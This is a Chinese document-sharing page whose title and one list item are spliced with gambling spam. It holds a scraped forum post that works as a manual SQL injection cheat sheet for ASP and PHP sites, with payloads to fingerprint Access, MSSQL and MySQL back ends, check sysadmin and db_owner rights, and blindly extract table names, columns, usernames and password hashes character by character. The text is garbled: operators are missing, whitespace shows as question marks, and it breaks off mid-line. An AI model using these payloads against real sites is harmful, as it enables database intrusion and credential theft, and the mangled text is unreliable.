有哪些信誉好的足球投注网站- 1、本文档共11页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
《各种手工注入来研究研究吧
各种手工注入,来研究研究吧 [复制链接]
发表于 7?天前 |只看该作者 |倒序浏览
渗透之脚本入侵(ASP,PHP)
1. 数字型:view sourceprint?1 and 1=1 and 1=2
2.字符型:view sourceprint?1 and 1=1 and 1=2
3.有哪些信誉好的足球投注网站型:view sourceprint?1 % and 1=1 and %=% 或者 % and 1=2 and %=%
(PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”keyword”),赋值“KYO”到SQL语句中的时候即变为Select * from 表名 where keyword like ‘%KYO%’)
语句型(IIS报不报错,语句自己区分):
? ?? ?? ? and user0??
? ?? ?? ? and??(select count(*) from msysobjects)0 ……(页面错误为access数据库)
? ?? ?? ? and??(select count(*) from sysobjects)0 ……(页面正常为MSSQL数据库)
? ?? ?? ? and??db_name()0 ……(爆数据库名)
? ?? ?? ?and 0(select @@version)--??(爆SQLServer版本信息以及服务器操作系统的类型和版本信息)
? ???粗略型:加 ’(根据服务器报错的信息来判断)
? ?? ???加 ;--(;和--MSSQL数据库里面一般都有, ; 表示分离,-- 则是注释符ACCESS数据库里没有)
? ?判断MYSQL权限:? ?? ?? ?? ?? ?? ?? ?and 0(Select ISSRVROLEMEMBER(’sysadmin’))--(页面正常则为SA)
? ?? ?? ? and 0(Select IS_MEMBER(’db_owner’))--(页面正常则为db_owner)
? ?? ?? ?? ?? ?? ?and 0(Select IS_MEMBER(’public’))--(页面正常则是public)
? ???PS:以上方法适用于参数是int的时候,若为字符型,需在参数后添加’和查询语句后添加;
开始进行SQL注入(ACCESS):? ?? ?
??猜解表名:
? ?? ?? ? and 0(select count(*) from 表名) 或and exists(Select * from 表名)
? ?? ?? ?? ?? ?? ?? ?? ?and 1(select count(*) from 表名) (页面错误说明帐号数目就是1个)
? ?? ?? ?猜解字段:
? ? and exists(Select 字段名 from 表名)(页面正常存在,不正常不存在)
? ?? ?? ?猜解用户名和密码长度:
? ?? ?? ?? ?? ?? ?and(Select top 1 len(列名) from 表名)N (TOP表示把最前面的一条记录提取出来;N为变换猜解的列长度,页面错误即说明该列长度为N)? ?? ?? ?? ?? ?? ?
? ?? ?? ?? ?? ?? ? 如:and 1=(select count(*) from user where len(name)6) 错误
? ?? ?? ?? ?? ?? ? and 1=(select count(*) from user where len(name)5) 正确
? ?? ?? ?? ?? ?? ???
? ?? ?? ?? ? 猜解用户名和密码:and (select top 1 asc(mid(列名,1,1)) from 表名)0
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???如:and (select top 1 asc(mid(user,1,1)) from name)96页面正常
? ?? ?? ?? ?? ?? ?? ?? ? and (select top 1 asc(mid(user,1,1)) from name)97页面错误
? ?? ?? ?? ?? ?? ?? ?? ? 则ASCLL码为97
? ?? ?? ?? ?? ?PS:因为MD5的密文只有16,18,32,40这几个,所以猜解密码的时候只要试一试15,16,17,18,31,32,39,40等就简单些。
开始进行SQL注入(MYSQL):? ???
? ?? ?? ?? ? 爆出表名和字段: having 1=1-- -
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?插入新记录: g
文档评论(0)